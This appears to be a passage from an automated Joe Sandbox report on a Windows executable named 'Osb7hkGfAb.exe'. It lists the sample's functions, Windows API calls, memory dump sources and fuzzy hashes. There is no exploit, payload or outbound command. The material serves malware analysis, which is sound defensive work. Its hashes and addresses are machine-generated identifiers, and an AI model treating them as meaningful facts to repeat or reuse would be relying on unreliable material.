                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: PathSearch
                                                                  • String ID:
                                                                  • API String ID: 2203818243-0
                                                                  • Opcode ID: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                                  • Instruction ID: 99b882ef8ac932529d6fdfe3c41faefb6a71927cb26e20fd81cb329c01224dc0
                                                                  • Opcode Fuzzy Hash: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                                  • Instruction Fuzzy Hash: 93E0DF72304210EFD710DF649E49BAB37A8DF10368B20427AE111A60C2E6F89906873D
                                                                  Function 00405FAB Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                  • Instruction ID: 8c71f3c26dc4a4bf3eef9e60a583d004d00a96479e721722a8f6be6a9d57506c
                                                                  • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                  • Instruction Fuzzy Hash: 1CE0E6B201450ABEDF095F50DD0ED7B3B1DE704300F14452EF906D4050E6B5A9205A34
                                                                  Function 00405D08 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                  • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                                  • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                  • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                                  Function 00405D37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                  • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                  • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                                  Function 6FF82921 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(6FF8404C,00000004,00000040,6FF8403C), ref: 6FF8293F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 91edafd4bb730115dbe5b402b22e4b3e0e539df08927123103e7ab0b7154ee1c
                                                                  • Instruction ID: c9dfb5526f7b7bde3b782e907996b294543b860d5e2efbee1fe55e6b92482992
                                                                  • Opcode Fuzzy Hash: 91edafd4bb730115dbe5b402b22e4b3e0e539df08927123103e7ab0b7154ee1c
                                                                  • Instruction Fuzzy Hash: 60F045B1528A80DECB60CF7888457273FF8B71B369B12456AE178D7361E37550649B12
                                                                  Function 004023E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileString
                                                                  • String ID:
                                                                  • API String ID: 1096422788-0
                                                                  • Opcode ID: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                                  • Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
                                                                  • Opcode Fuzzy Hash: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                                  • Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E
                                                                  Function 00405F7D Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,00000002,Call), ref: 00405FA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                  • Instruction ID: 8d979316dbb681ef417a562383420c35b8ea1d7cbf1ba97b3ef1f912197d15a8
                                                                  • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                  • Instruction Fuzzy Hash: 26D0EC7200460ABBDF115E90DD05FAB3B1DEB08310F044426FA05E5091D679D530AA25
                                                                  Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                                  • Instruction ID: 936ed37629fa473271aaed7dd48578ad272974d6d3f069640798472dc64bc079
                                                                  • Opcode Fuzzy Hash: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                                  • Instruction Fuzzy Hash: F6D01232704115DBDB10EFA59B08A9E73B5EB10325B308277E111F21D1E6B9C9469A2D
                                                                  Function 00403300 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                  • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                  • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                  • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                  Function 00401F7B Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                    • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,76F923A0), ref: 0040527A
                                                                    • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                    • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                    • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                                    • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                                    • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                                    • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2972824698-0
                                                                  • Opcode ID: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                                  • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                                  • Opcode Fuzzy Hash: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                                  • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                                  Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                  • Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
                                                                  • Opcode Fuzzy Hash: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                  • Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628

                                                                  Non-executed Functions

                                                                  Function 0040535C Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                                  • GetClientRect.USER32(?,?), ref: 00405407
                                                                  • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                                  • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                                    • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                                  • ShowWindow.USER32(00000000), ref: 00405554
                                                                  • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                                  • ShowWindow.USER32(00000008), ref: 004055A1
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                                  • CreatePopupMenu.USER32 ref: 004055E6
                                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
                                                                  • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                                  • OpenClipboard.USER32(00000000), ref: 00405680
                                                                  • EmptyClipboard.USER32 ref: 00405686
                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                                  • CloseClipboard.USER32 ref: 004056D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                  • String ID:
                                                                  • API String ID: 590372296-0
                                                                  • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                  • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                                  • Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                  • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                                  Function 0040460D Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                                  • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                                  • lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
                                                                  • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                                    • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                                    • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Osb7hkGfAb.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                    • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                    • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\Osb7hkGfAb.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                    • Part of subcall function 004063D2: CharPrevA.USER32(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                  • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
